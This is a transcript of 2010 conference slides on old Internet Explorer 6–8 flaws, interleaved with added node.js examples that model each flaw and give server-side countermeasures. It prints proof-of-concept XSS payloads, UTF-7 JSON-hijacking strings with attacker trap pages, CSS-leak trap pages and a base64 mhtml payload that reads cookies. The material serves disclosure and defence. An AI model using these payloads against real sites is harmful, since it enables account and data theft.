Internet Explorer exSpoilt Milk Codes

December 14, 2010

Slide summary: presentation material from POC2010, a security conference in Korea.

Text of each slide
1.

Internet Explorer exSpoilt Milk Codes (a spoilt-milk attack on IE)
Yosuke HASEGAWA http://j.mp/yosuke

2.

Who am I?
Yosuke HASEGAWA, NetAgent Co., Ltd., R&D dept.
Microsoft MVP for Consumer Security, Oct 2005
http://utf-8.jp/
Writing obfuscated JavaScript, e.g. jjencode, aaencode
INNOVATION TO THE FUTURE NetAgent Co., Ltd.

3.

Today's topic

4.

Today's topic 오늘의 화제 IE6 is 'spoilt milk' web browser. IE6は腐ったミルクみたいなブラウザ Microsoft themselves admitted Microsoft自身も認めている Many security flaws left untouched for years. 長い間放置されている問題点が多数。 Junst only IE6? No. IE6だけ? まさか。 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 4

5.

IE6 is a 'spoilt milk' browser

7.

Many flaws left untouched for years: http://www.youtube.com/watch?v=KZSnCbGDl6Y

9.

Just only IE6? No. IE7 and IE8 also have flaws.

10.

Today's topic, toward IE9: by shedding light on past flaws, expect IE to become a more secure browser.

11.

Untouched flaws

12.

Untouched flaws (✓ = affected)

flaw                             IE6  IE7  IE8
MLang encode conversion issue     ✓    ✓
JSON hijack with UTF-7            ✓    ✓
bypass Content-Disposition        ✓    ✓    ✓
information leakage via CSS       ✓    ✓    ✓
JavaScript back-quote issue       ✓    ✓    ✓
XSS with mhtml handler            ✓    ✓    ✓

14.

MLang encode conversion issue
"MLang": a DLL for multi-language support, including conversion of text encodings. Entry points: ConvertINetMultiByteToUnicode, ConvertINetUnicodeToMultiByte, ConvertINetString.

15.

MLang encode conversion issue
IE converts text from outside to Unicode with MLang and handles it as Unicode: HTML in Shift_JIS, EUC-JP, EUC-KR, … goes through MLang and comes out as UTF-16LE.

16.

MLang encode conversion issue
Even when given a broken byte sequence, MLang still converts it to Unicode "accordingly". "Converted accordingly"...

17.

MLang encode conversion issue
Meta characters (" < >) that do not exist in the original byte sequence are generated, which leads to XSS.

18.

MLang encode conversion issue

<meta http-equiv="Content-Type" content="text/html; charset=XXXXX" />
...
<input value="(0xNN)(0xNN)(0xNN)onmouseover=alert(1)//(0xNN)(0xNN)(0xNN)" type="text">

Each (0xNN) is a byte sequence that is invalid in charset XXXXX. After MLang's conversion the markup reads:

<input value="??"onmouseover=alert(1)// ??"" type="text">

19.

MLang encode conversion issue
Preventing this XSS on the server side is very hard: every character/byte has to be validated as well-formed in the declared charset.

20.

MLang encode conversion issue
Details are not published at present.
Affected: IE6 / IE7. IE8: fixed. Reported: Oct 2007.
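The byte-level check that slide 19 calls for, as an added example (not code from the slides). It is written for Shift_JIS because the slides do not name the affected charset; the function names and the sample bytes are assumptions made here. The validator reports the first byte that does not begin a well-formed sequence, and the sanitizer replaces such bytes so that the browser's converter never has to "guess":

```javascript
// Shift_JIS byte classes, following the WHATWG Shift_JIS decoder:
// single bytes 0x00-0x7F and 0xA1-0xDF; lead bytes 0x81-0x9F and 0xE0-0xFC,
// each of which needs a trail byte in 0x40-0x7E or 0x80-0xFC.
// (Assumption: the target charset is Shift_JIS; the slides do not name it.)
function isSjisSingle(b) { return b <= 0x7f || (b >= 0xa1 && b <= 0xdf); }
function isSjisLead(b)   { return (b >= 0x81 && b <= 0x9f) || (b >= 0xe0 && b <= 0xfc); }
function isSjisTrail(b)  { return (b >= 0x40 && b <= 0x7e) || (b >= 0x80 && b <= 0xfc); }

// Walks the bytes exactly as a strict decoder would. Returns { ok: true } or
// { ok: false, offset } with the offset of the first byte that does not begin
// a well-formed sequence (a lone lead byte, a stray 0x80/0xA0/0xFD-0xFF).
function validateShiftJis(bytes) {
  let i = 0;
  while (i < bytes.length) {
    const b = bytes[i];
    if (isSjisSingle(b)) { i += 1; continue; }
    if (isSjisLead(b) && i + 1 < bytes.length && isSjisTrail(bytes[i + 1])) { i += 2; continue; }
    return { ok: false, offset: i };
  }
  return { ok: true };
}

// Replaces every malformed byte with "?" (0x3F). After a bad lead byte the
// following byte is re-examined on its own, so an ASCII quote that followed
// a dangling lead byte stays a quote instead of being absorbed or invented
// by a lenient converter.
function sanitizeShiftJis(bytes) {
  const out = [];
  let i = 0;
  while (i < bytes.length) {
    const b = bytes[i];
    if (isSjisSingle(b)) { out.push(b); i += 1; continue; }
    if (isSjisLead(b) && i + 1 < bytes.length && isSjisTrail(bytes[i + 1])) {
      out.push(b, bytes[i + 1]); i += 2; continue;
    }
    out.push(0x3f); i += 1;
  }
  return Buffer.from(out);
}

// Constructed sample shaped like the attribute value on slide 18: a valid
// two-byte character, ASCII, then a dangling lead byte right before the quote.
const SAMPLE_ATTR = Buffer.concat([
  Buffer.from([0x82, 0xa0]),                         // "あ" in Shift_JIS
  Buffer.from("onmouseover=alert(1)//", "ascii"),
  Buffer.from([0x82]),                               // lead byte, no trail byte
  Buffer.from('"', "ascii"),
]);
```

Run with node. Rejecting (validateShiftJis) is the safer choice for input that is stored; sanitizeShiftJis is for output paths where the bytes must be emitted anyway. Either way the point of slide 19 holds: the check has to run over every byte, not just over the characters an HTML encoder knows about.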

22.

JSON Hijack with UTF-7 Target: Containing secret data in JSON 機密情報を含むJSON If attacker can control a part of JSON string 攻撃者がJSON内の一部をコントロールできる e.g., Web mail notification 例えばWebメールの新着通知など Attacker can read inside data of the JSON JSON内のデータを盗み見できる INNOVATION TO THE FUTURE NetAgent Co., Ltd. 22

23.

JSON Hijack with UTF-7

JSON for target: http://example.com/newmail.json

[
{
"name" : "abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-",
"mail" : "[email protected]"
},
{
"name" : "John Smith",
"mail" : "[email protected]"
}
]

The first "name" is injected by the attacker. This means...

24.

JSON Hijack with UTF-7

Converted from UTF-7 to another encoding, the same JSON reads as:

[
{
"name" : "abc"}];var t=[{"":"",
"mail" : "[email protected]"
},
{
"name" : "John Smith",
"mail" : "[email protected]"
}
]

JSON for target: http://example.com/newmail.json

25.

JSON Hijack with UTF-7

Trap HTML page created by the attacker:

<script src="http://example.com/newmail.json" charset="utf-7"></script>
<script> alert( t[ 1 ].name + t[ 1 ].mail ); </script>

JSON for target: http://example.com/newmail.json

[
{
"name" : "abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-",
"mail" : "[email protected]"
},
{
"name" : "John Smith",
"mail" : "[email protected]"
}
]

26.

JSON Hijack with UTF-7: normal flow (diagram)

User -> Web mail: XHR.send(…)
Web mail -> User: JSON { "from" : "[email protected]" }, which the page passes to eval( JSON )

27.

JSON Hijack with UTF-7: attack flow (diagram)

Attacker -> Web mail: a mail with From: "+MPv…ACI-"
Attacker -> User: trap HTML containing <script src="json">
User -> Web mail: the <script src="json"> request
Web mail -> User: JSON { "from" : "+MPv/…ACI-" }, executed as script in the trap page

28.

JSON Hijack with UTF-7

Trap HTML page created by the attacker:

<script src="http://example.com/newmail.json" charset="utf-7"></script>

JSON for target: http://example.com/newmail.json
Content-Type: application/json; charset=utf-8

[
{
"name" : "abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-",
"mail" : "[email protected]"
},
{
"name" : "John Smith",
"mail" : "[email protected]"
}
]

Priority: the charset attribute on the script element takes priority over the charset in the HTTP response header, so the JSON is decoded as UTF-7.

29.

JSON Hijack with UTF-7 Published at Black Hat Japan 2008 and POC2008 Black Hat Japan 2008, POC2008 にて発表 Affected : IE6 / IE7 IE8 : fixed Reported : Oct 2008 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 29

30.

JSON Hijack with UTF-7

Countermeasures on the server:
- Escape "+" to "\u002b" in the JSON
- Accept only POST

{
"name" : "abc\u002bMPv/f...QA7-var t\u002bAD0A...."
}
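An added example, not code from the slides, that shows the UTF-7 reinterpretation of slides 23 to 28 end to end and then applies the "\u002b" countermeasure of slide 30. A minimal UTF-7 decoder stands in for <script charset="utf-7">, new Function() stands in for the browser running the response as script, and the JSON sample is the one from slide 23. The names decodeUtf7, runAsUtf7Script and escapePlusForJson are assumptions made here:

```javascript
// Minimal RFC 2152 UTF-7 decoder: "+<base64 of UTF-16BE>-" opens a shift
// sequence, "+-" is a literal "+". It stands in for what IE6/7 do when
// <script charset="utf-7"> pulls the JSON in. (Assumed name.)
function decodeUtf7(text) {
  let out = "";
  let i = 0;
  while (i < text.length) {
    if (text[i] !== "+") { out += text[i++]; continue; }
    i++;                                                // skip "+"
    if (text[i] === "-") { out += "+"; i++; continue; } // "+-" => "+"
    let b64 = "";
    while (i < text.length && /[A-Za-z0-9+/]/.test(text[i])) b64 += text[i++];
    if (text[i] === "-") i++;                           // optional terminator
    const bytes = Buffer.from(b64, "base64");           // Node tolerates missing "="
    for (let j = 0; j + 1 < bytes.length; j += 2) {
      out += String.fromCharCode((bytes[j] << 8) | bytes[j + 1]); // UTF-16BE unit
    }
  }
  return out;
}

// Copy of the newmail.json body from slide 23 (constructed sample); the
// attacker controls the first "name" through the sender name of a mail.
const NEWMAIL_JSON = `[
{
"name" : "abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-",
"mail" : "[email protected]"
},
{
"name" : "John Smith",
"mail" : "[email protected]"
}
]`;

// Emulates the trap page: decode the response as UTF-7 and run it as a
// script. Returns whatever the script left in "t" (undefined if nothing).
// new Function() stands in for the browser executing <script src>.
function runAsUtf7Script(body) {
  const src = decodeUtf7(body);
  return new Function(src + "\n;return (typeof t === 'undefined') ? undefined : t;")();
}

// Server-side countermeasure from slide 30: write "+" as \u002b. JSON parsers
// still read it as "+", but the byte "+" never appears on the wire, so a
// UTF-7 decoder has no shift sequence to open.
function escapePlusForJson(json) {
  return json.replace(/\+/g, "\\u002b");
}
```

Run with node. The two characters that "+MPv/fwAiAH0AXQA7-" decodes to before the quote (U+30FB and U+FF7F) land inside the string literal "abc…" and do not affect the hijack; what matters is the "}];" that closes the array and the "var t=[{" that opens the attacker's own. The "accept only POST" countermeasure is not modelled: it works because a <script src> can only issue a GET.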

32.

Bypass Content-Disposition
"Content-Disposition: attachment" is a download directive for browsers, sometimes used to prevent XSS:

Content-Type: text/html; charset=utf-8
Content-Disposition: attachment; filename=attach.html

33.

Bypass Content-Disposition
"Content-Disposition: attachment" can be bypassed with specially crafted JavaScript written by the attacker.

34.

Bypass Content-Disposition

Trap page by the attacker:

<script>
// crafted JavaScript here.
// actual code is not open today :)
</script>
<iframe src="http://example.com/download.cgi"></iframe>

http://example.com/download.cgi: the target content, served with "Content-Disposition: attachment".

35.

Bypass Content-Disposition
Published: Jul 2007 in Japan. Affected: IE6 / IE7 / IE8.
There is no way to prevent this XSS on the server side.

37.

Information leakage via CSS
Sensitive data in HTML leaks through the CSS properties "font-family" and "quotes".
Fixed: MS10-071, Oct 2010.

38.

Information leakage via CSS

Target page containing sensitive data:

<html>
<!-- injected by attacker -->
<div>}.a{font-family:a</div>
<!-- sensitive data here -->
<div>Secret data</div>

Trap page created by the attacker:

<link rel="stylesheet" href="http://example.com/target.html" type="text/css">
...
<div class="a" id="target"></div>
<script>
alert(document.getElementById("target").currentStyle.fontFamily);
</script>

39.

Information leakage via CSS

The same trap page, loading the target with @import instead of <link>:

<style> @import url("http://example.com/target.html"); </style>
...
<div class="a" id="target"></div>
<script>
alert(document.getElementById("target").currentStyle.fontFamily);
</script>

40.

Information leakage via CSS
Published: Nov 2008 in Japan.
Republished: Sep 2010, Secunia advisory SA41271.
Fixed: MS10-071, Oct 2010.
Affected: IE6 / IE7 / IE8.
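An added example, not code from the slides, modelling why the trap pages on slides 38 and 39 read the secret: a tolerant CSS scanner ignores everything up to the injected "}.a{" and then takes the rest of the document, secret included, as the font-family value. acceptAsStylesheet states the rule browsers adopted afterwards for cross-origin sheets (the slides describe only that MS10-071 fixed it, not how). Function names and the sample page are assumptions made here; currentStyle itself is IE-only, so the read-out is modelled rather than called:

```javascript
// Tiny error-recovering CSS scanner modelled on how a browser treats a
// stylesheet: junk before "{" is dropped, a stray "}" ends nothing, and a
// declaration value runs to the next ";" or "}" or to end of file.
function tolerantCssRules(text) {
  const rules = [];
  let pos = 0;
  while (pos < text.length) {
    const open = text.indexOf("{", pos);
    if (open < 0) break;
    const prevClose = text.lastIndexOf("}", open);
    const selector = text.slice(Math.max(prevClose + 1, pos), open).trim();
    const close = text.indexOf("}", open + 1);
    const body = close < 0 ? text.slice(open + 1) : text.slice(open + 1, close);
    const decls = {};
    for (const decl of body.split(";")) {
      const colon = decl.indexOf(":");
      if (colon > 0) decls[decl.slice(0, colon).trim()] = decl.slice(colon + 1).trim();
    }
    rules.push({ selector, decls });
    pos = close < 0 ? text.length : close + 1;
  }
  return rules;
}

// What the trap page's currentStyle.fontFamily read-out yields for class "a",
// or null when the target page produced no such rule.
function leakedFontFamily(targetHtml) {
  for (const rule of tolerantCssRules(targetHtml)) {
    if (rule.selector === ".a" && rule.decls["font-family"] !== undefined) {
      return rule.decls["font-family"];
    }
  }
  return null;
}

// Constructed target page, copied from slide 38.
const TARGET_HTML = `<html>
<!-- injected by attacker -->
<div>}.a{font-family:a</div>
<!-- sensitive data here -->
<div>Secret data</div>`;

// The rule modern browsers apply (not stated on the slides): a cross-origin
// resource is honoured as a stylesheet only when it is served as text/css.
// Same-origin sheets are left to the browser's usual sniffing.
function acceptAsStylesheet(contentType, crossOrigin) {
  const isCss = /^text\/css\s*(;|$)/i.test(contentType.trim());
  return isCss || !crossOrigin;
}
```

Run with node. The scanner is deliberately forgiving: that forgiveness is exactly the property the attack relies on, and it is why the fix had to be a content-type check on cross-origin sheets rather than stricter CSS parsing.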

42.

JavaScript back-quotes issue

IE treats the grave accent (`) as an attribute value delimiter, like " and '.

<input type="text" id='x' value=`abcd` />

43.

JavaScript back-quotes issue

When the innerHTML property is read, IE strips the quotation marks (") from an attribute value that contains no whitespace.

<div id="x">
<input type="text" value="abcd" >
</div>
...
alert( $("x").innerHTML );   // $(id): shorthand for document.getElementById(id)

44.

JavaScript back-quotes issue

<div id="div1">
<input type="text" value="``onmouseover=alert(1)" >
</div>
<div id="div2"></div>
<script>
document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;
</script>

Resulting markup of div2 in IE:

<DIV id=div2>
<INPUT onmouseover=alert(1) type=text></DIV>

45.

JavaScript back-quotes issue
Published: Apr 2007 in Japan. Affected: IE6 / IE7 / IE8.
Reported: Nov 2007 as IE8 beta feedback.
"keep this behavior for backward compatibility", MS said.
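An added example, not code from the slides or from IE, that models the two behaviours of slides 42 to 44 (the backquote accepted as a quote character; quotes dropped from whitespace-free values when innerHTML is read) and replays the div1 to div2 copy. quotedSerialize is the contrast case: a serializer that always quotes cannot split a value into a new attribute. All names are assumptions made here:

```javascript
// Model of IE's innerHTML getter (slide 43): attribute values containing no
// whitespace are written back without quotes; tag names come out upper case.
function ieSerialize(tag, attrs) {
  const parts = [tag.toUpperCase()];
  for (const [name, value] of Object.entries(attrs)) {
    parts.push(/\s/.test(value) ? `${name}="${value}"` : `${name}=${value}`);
  }
  return `<${parts.join(" ")}>`;
}

// Model of IE's attribute tokenizer (slide 42): `...` is accepted as a quoted
// value alongside "..." and '...'; an unquoted value runs to the next space.
function ieParseAttrs(markup) {
  const inner = markup.replace(/^<\S+\s*/, "").replace(/\s*\/?>$/, "");
  const attrs = {};
  const re = /([^\s=`"']+)(?:=(?:"([^"]*)"|'([^']*)'|`([^`]*)`|([^\s"'`]*)))?/g;
  let m;
  while ((m = re.exec(inner)) !== null) {
    let value = "";
    for (const g of [m[2], m[3], m[4], m[5]]) {
      if (g !== undefined) { value = g; break; }
    }
    attrs[m[1]] = value;
  }
  return attrs;
}

// The div1 -> div2 copy from slide 44: the element is read through the
// IE-style getter, then re-parsed when the string is assigned to innerHTML.
function innerHtmlRoundTrip(attrs) {
  return ieParseAttrs(ieSerialize("input", attrs));
}

// Contrast: a serializer that always quotes and escapes. A round trip through
// it cannot turn part of a value into a new attribute.
function quotedSerialize(tag, attrs) {
  const parts = [tag];
  for (const [name, value] of Object.entries(attrs)) {
    const escaped = value.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
    parts.push(`${name}="${escaped}"`);
  }
  return `<${parts.join(" ")}>`;
}
```

Run with node. The model makes the practical point explicit: the value reaches the serializer already decoded, so output encoding on the server does not change what the IE-style getter emits; only the serializer can prevent the split, which is why the "backward compatibility" answer on slide 45 left the problem in place.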

47.

XSS with mhtml handler
At one time, IE assumed that any content reached through the "mhtml" handler was MHTML and handled it as such.

48.

XSS with mhtml handler

MHTML: the web archive format defined in RFC 2557 (*.eml or *.mht):

From: [email protected]
To: [email protected]
Subject: test
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html>
<body>
<h1>Hello</h1>
</body>
</html>

49.

XSS with mhtml handler

mhtml:http://example.com/test.html

<html>
<div>
Subject: test
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: base64
PGh0bWw+DQo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTs8L3NjcmlwdD4NCjwvaHRtbD4NCg==
</div>
</html>

Everything inside the <div> is injected by the attacker. The base64 body decodes to:

<html>
<script>alert(document.location);</script>
</html>

50.

XSS with mhtml handler

The same injected content as on the previous slide. This should have been fixed by MS07-034.

52.

XSS with mhtml handler
XSS via mhtml again: "JavaScript execution via MHTML scheme" in the HTML5 Security Cheatsheet by @Lever_One, http://heideri.ch/jso/#96

53.

XSS with mhtml handler

mhtml:http://heideri.ch/jso/test.html!xss.html

<html>
<body>
<b>some content without two new line \n\n</b>
Content-Type: multipart/related; boundary="***"<b>some content without two new line</b>
--***
Content-Location: xss.html
Content-Transfer-Encoding: base64

PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1
cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9
dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy
YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg
-</body> </html>

The base64 part decodes to:

<iframe name=lo style=display:none></iframe>
<script>
url=location.href;document.getElementsByName('lo')[0].src=url.substring(6,url.indexOf('/',15));setTimeout("alert(frames['lo'].document.cookie)",2000);
</script>

54.

XSS with mhtml handler
Published: May 2004 in Japan.
Once fixed: Jun 2007 by MS07-034.
Reopened: Jun 2010.
Affected: IE6 / IE7 / IE8 (XP only?)

55.

Untouched flaws: how is IE9?

56.

Untouched flaws (✓ = affected)

flaw                             IE6  IE7  IE8  IE9
MLang encode conversion issue     ✓    ✓
JSON hijack with UTF-7            ✓    ✓
bypass Content-Disposition        ✓    ✓    ✓
information leakage via CSS       ✓    ✓    ✓
JavaScript back-quote issue       ✓    ✓    ✓
XSS with mhtml handler            ✓    ✓    ✓

57.

Fixed in the IE9 beta

58.

Conclusion

59.

Conclusion
- IE6/7/8 have many flaws which were spotted ages ago and still have not been effectively addressed.
- These are fixed in the IE9 beta.
- If you find flaws in IE9, report them while it is in beta. Fixes will probably come much more slowly after IE9 is released.

60.

References
- Attacking with Character Encoding for Profit and Fun. http://bit.ly/alE7F3
- JUMPERZ.NET. http://www.jumperz.net/test/xss10.jsp
- "I made a demo that extracts mixi's post_key with an improved(?) CSSXSS technique", ?D of K. http://d.hatena.ne.jp/ofk/20081111/1226407593
- Internet Explorer Cross-Origin CSS Style Sheet Handling Vulnerability, Secunia advisory SA41271. http://secunia.com/advisories/41271/
- "[This is terrible] IE's interpretation of quotation marks", @IT. http://www.atmarkit.co.jp/fcoding/articles/webapp/01/webapp01a.html
- [openmya:038082] MS07-034: arbitrary script execution via the mhtml: protocol handler. http://archive.openmya.devnull.jp/2007.06/msg00060.html
- JavaScript execution via MHTML-scheme, HTML5 Security Cheatsheet. http://heideri.ch/jso/#96

61.

Thanks to
David Ross and MSRC for helpful suggestions.
@Lever_One for telling me the details of the mhtml issue.
Google Translation for the Korean translation :-)
...and you! Thank you for your attention.

62.

Questions?
mail: [email protected] / [email protected]
Twitter: @hasegawayosuke
Web site: http://utf-8.jp/